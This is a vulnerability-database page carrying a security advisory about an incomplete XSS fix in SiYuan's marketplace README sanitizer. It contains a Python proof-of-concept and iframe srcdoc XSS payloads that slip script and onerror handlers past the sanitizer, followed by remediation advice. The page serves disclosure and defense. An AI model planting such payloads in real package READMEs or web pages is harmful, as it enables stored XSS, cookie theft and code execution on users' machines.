Vulnerability Database

357,831

Total vulnerabilities in the database

SiYuan has incomplete fix for CVE-2026-33066: XSS — github.com/siyuan-note/siyuan/kernel

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Summary

The incomplete fix for SiYuan's bazaar README rendering enables the Lute HTML sanitizer but fails to block <iframe> tags, allowing stored XSS via srcdoc attributes containing embedded scripts that execute in the Electron context.

Affected Package

  • Ecosystem: Go
  • Package: github.com/siyuan-note/siyuan
  • Affected versions: < commit b382f50e1880
  • Patched versions: >= commit b382f50e1880

Details

The renderPackageREADME() function in kernel/bazaar/readme.go renders Markdown README content from bazaar (marketplace) packages into HTML. The original vulnerability allowed stored XSS through unsanitized HTML in READMEs. The fix adds luteEngine.SetSanitize(true) to enable Lute's built-in HTML sanitizer.

However, the Lute sanitizer in lute/render/sanitizer.go has a critical gap:

  1. &lt;iframe&gt; is explicitly commented out of setOfElementsToSkipContent, so iframe tags pass through.
  2. The srcdoc attribute is checked against URL-prefix blocklists (javascript:, data:text/html), but srcdoc contains raw HTML content, not a URL. A value like &lt;img src=x onerror=alert(1)&gt; does not start with any blocked prefix.
  3. The browser renders srcdoc HTML in a nested browsing context, executing embedded scripts and event handlers.

The fix correctly blocks direct &lt;script&gt; tags, event handler attributes, and javascript: protocol links. However:

  • &lt;iframe srcdoc=&quot;&lt;script&gt;alert(document.domain)&lt;/script&gt;&quot;&gt; passes through because iframe is not blocked and the srcdoc value is raw HTML (not a URL scheme).
  • &lt;iframe srcdoc=&quot;&lt;img src=x onerror=alert(document.cookie)&gt;&quot;&gt; also passes because the event handler is inside the srcdoc string value, not a top-level tag attribute.

PoC

&quot;&quot;&quot; CVE-2026-33066 - Incomplete Sanitization in SiYuan Bazaar README Rendering Component: kernel/bazaar/readme.go :: renderPackageREADME() Patch: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428 &quot;&quot;&quot; import re import sys from html.parser import HTMLParser ELEMENTS_TO_SKIP_CONTENT = { &quot;frame&quot;, &quot;frameset&quot;, # &quot;iframe&quot;, # NOTE: iframe is commented out in the original Go code! &quot;noembed&quot;, &quot;noframes&quot;, &quot;noscript&quot;, &quot;nostyle&quot;, &quot;object&quot;, &quot;script&quot;, &quot;style&quot;, &quot;title&quot;, } EVENT_ATTRS = { &quot;onafterprint&quot;, &quot;onbeforeprint&quot;, &quot;onbeforeunload&quot;, &quot;onerror&quot;, &quot;onhashchange&quot;, &quot;onload&quot;, &quot;onmessage&quot;, &quot;onoffline&quot;, &quot;ononline&quot;, &quot;onpagehide&quot;, &quot;onpageshow&quot;, &quot;onpopstate&quot;, &quot;onresize&quot;, &quot;onstorage&quot;, &quot;onunload&quot;, &quot;onblur&quot;, &quot;onchange&quot;, &quot;oncontextmenu&quot;, &quot;onfocus&quot;, &quot;oninput&quot;, &quot;oninvalid&quot;, &quot;onreset&quot;, &quot;onsearch&quot;, &quot;onselect&quot;, &quot;onsubmit&quot;, &quot;onkeydown&quot;, &quot;onkeypress&quot;, &quot;onkeyup&quot;, &quot;onclick&quot;, &quot;ondblclick&quot;, &quot;onmousedown&quot;, &quot;onmousemove&quot;, &quot;onmouseout&quot;, &quot;onmouseover&quot;, &quot;onmouseleave&quot;, &quot;onmouseenter&quot;, &quot;onmouseup&quot;, &quot;onmousewheel&quot;, &quot;onwheel&quot;, &quot;ondrag&quot;, &quot;ondragend&quot;, &quot;ondragenter&quot;, &quot;ondragleave&quot;, &quot;ondragover&quot;, &quot;ondragstart&quot;, &quot;ondrop&quot;, &quot;onscroll&quot;, &quot;oncopy&quot;, &quot;oncut&quot;, &quot;onpaste&quot;, &quot;onabort&quot;, &quot;oncanplay&quot;, &quot;oncanplaythrough&quot;, &quot;oncuechange&quot;, &quot;ondurationchange&quot;, &quot;onemptied&quot;, &quot;onended&quot;, &quot;onloadeddata&quot;, &quot;onloadedmetadata&quot;, &quot;onloadstart&quot;, &quot;onpause&quot;, &quot;onplay&quot;, &quot;onplaying&quot;, &quot;onprogress&quot;, &quot;onratechange&quot;, &quot;onseeked&quot;, &quot;onseeking&quot;, &quot;onstalled&quot;, &quot;onsuspend&quot;, &quot;ontimeupdate&quot;, &quot;onvolumechange&quot;, &quot;onwaiting&quot;, &quot;ontoggle&quot;, &quot;onbegin&quot;, &quot;onend&quot;, &quot;onrepeat&quot;, &quot;http-equiv&quot;, &quot;formaction&quot;, } URL_ATTRS = {&quot;src&quot;, &quot;srcdoc&quot;, &quot;srcset&quot;, &quot;href&quot;} BLOCKED_URL_PREFIXES = (&quot;data:image/svg+xml&quot;, &quot;data:text/html&quot;, &quot;javascript&quot;) SELF_CLOSING_TAGS = {&quot;img&quot;, &quot;br&quot;, &quot;hr&quot;, &quot;input&quot;, &quot;meta&quot;, &quot;link&quot;, &quot;area&quot;, &quot;base&quot;, &quot;col&quot;, &quot;embed&quot;, &quot;source&quot;, &quot;track&quot;, &quot;wbr&quot;} def sanitize_attr_value_for_url(key, val): cleaned = val.lower().strip() cleaned = &#039;&#039;.join(c for c in cleaned if not c.isspace() or c == &#039; &#039;) for prefix in BLOCKED_URL_PREFIXES: if cleaned.startswith(prefix): return False return True class LuteSanitizer(HTMLParser): def __init__(self): super().__init__(convert_charrefs=False) self.output = [] self.skip_depth = 0 def handle_starttag(self, tag, attrs): tag = tag.lower() if tag in ELEMENTS_TO_SKIP_CONTENT: self.skip_depth += 1 self.output.append(&quot; &quot;) return if self.skip_depth &gt; 0: return sanitized_attrs = [] for key, val in attrs: key = key.lower() if val is None: val = &quot;&quot; if key in EVENT_ATTRS: continue if key in URL_ATTRS: if not sanitize_attr_value_for_url(key, val): continue sanitized_attrs.append((key, val)) parts = [&quot;&lt;&quot; + tag] for key, val in sanitized_attrs: escaped_val = val.replace(&quot;&amp;&quot;, &quot;&amp;amp;&quot;).replace(&#039;&quot;&#039;, &quot;&amp;quot;&quot;) parts.append(f&#039; {key}=&quot;{escaped_val}&quot;&#039;) if tag in SELF_CLOSING_TAGS: parts.append(&quot; /&quot;) parts.append(&quot;&gt;&quot;) self.output.append(&quot;&quot;.join(parts)) def handle_endtag(self, tag): tag = tag.lower() if tag in ELEMENTS_TO_SKIP_CONTENT: self.skip_depth -= 1 if self.skip_depth &lt; 0: self.skip_depth = 0 self.output.append(&quot; &quot;) return if self.skip_depth &gt; 0: return self.output.append(f&quot;&lt;/{tag}&gt;&quot;) def handle_data(self, data): if self.skip_depth &gt; 0: return self.output.append(data) def handle_entityref(self, name): if self.skip_depth &gt; 0: return self.output.append(f&quot;&amp;{name};&quot;) def handle_charref(self, name): if self.skip_depth &gt; 0: return self.output.append(f&quot;&amp;#{name};&quot;) def handle_comment(self, data): pass def handle_decl(self, decl): pass def get_output(self): return &quot;&quot;.join(self.output) def sanitize_html(html_str): sanitizer = LuteSanitizer() sanitizer.feed(html_str) return sanitizer.get_output() def check_xss(html_output): findings = [] srcdoc_match = re.search(r&#039;srcdoc=&quot;([^&quot;]*)&quot;&#039;, html_output, re.IGNORECASE) if srcdoc_match: import html as html_mod decoded = html_mod.unescape(srcdoc_match.group(1).lower()) if &#039;&lt;script&#039; in decoded: findings.append(&quot;iframe srcdoc: embedded &lt;script&gt; tag&quot;) if re.search(r&#039;on\w+\s*=&#039;, decoded): findings.append(&quot;iframe srcdoc: event handler in nested HTML&quot;) return findings PAYLOADS = [ &#039;&lt;iframe srcdoc=&quot;&lt;script&gt;alert(document.domain)&lt;/script&gt;&quot;&gt;&lt;/iframe&gt;&#039;, &#039;&lt;iframe srcdoc=&quot;&lt;img src=x onerror=alert(document.cookie)&gt;&quot;&gt;&lt;/iframe&gt;&#039;, ] bypass_found = False for payload in PAYLOADS: fixed_output = sanitize_html(payload) findings = check_xss(fixed_output) if findings: bypass_found = True print(f&quot;BYPASS: {payload[:80]}&quot;) for f in findings: print(f&quot; - {f}&quot;) if bypass_found: print(&quot;\nVULNERABILITY CONFIRMED&quot;) sys.exit(0) else: print(&quot;\nVULNERABILITY NOT CONFIRMED&quot;) sys.exit(1) python3 poc.py

Steps to reproduce:

  1. git clone https://github.com/siyuan-note/siyuan /tmp/siyuan_test
  2. cd /tmp/siyuan_test &amp;&amp; git checkout b382f50e1880ed996364509de5a10a72d7409428~1
  3. python3 poc.py (or go run poc.go if Go PoC)

Expected output:

VULNERABILITY CONFIRMED Iframe tags with srcdoc attributes bypass the Lute sanitizer, allowing embedded scripts to execute in the Electron context.

Impact

A malicious bazaar package author can include &lt;iframe srcdoc=&#039;&lt;script&gt;...&lt;/script&gt;&#039;&gt; in their README.md. When other users view the package in SiYuan's marketplace UI, the XSS executes in the Electron context with full application privileges, enabling data theft, local file access, and arbitrary code execution on the user's machine.

Suggested Remediation

  1. Add iframe to the setOfElementsToSkipContent set in the Lute sanitizer.
  2. If iframes must be preserved, strip the srcdoc attribute entirely or sanitize its HTML content recursively.
  3. Apply a Content Security Policy (CSP) to the README rendering context.

References

  • Incomplete fix commit: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428
  • Original CVE: CVE-2026-33066
  • Published: Apr 14, 2026
  • Updated: Apr 15, 2026
  • GHSA: GHSA-8q5w-mmxf-48jg
  • Severity: Medium
  • Exploit:
  • CISA KEV:

No technical information available.

Frequently Asked Questions

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.

Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.

Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.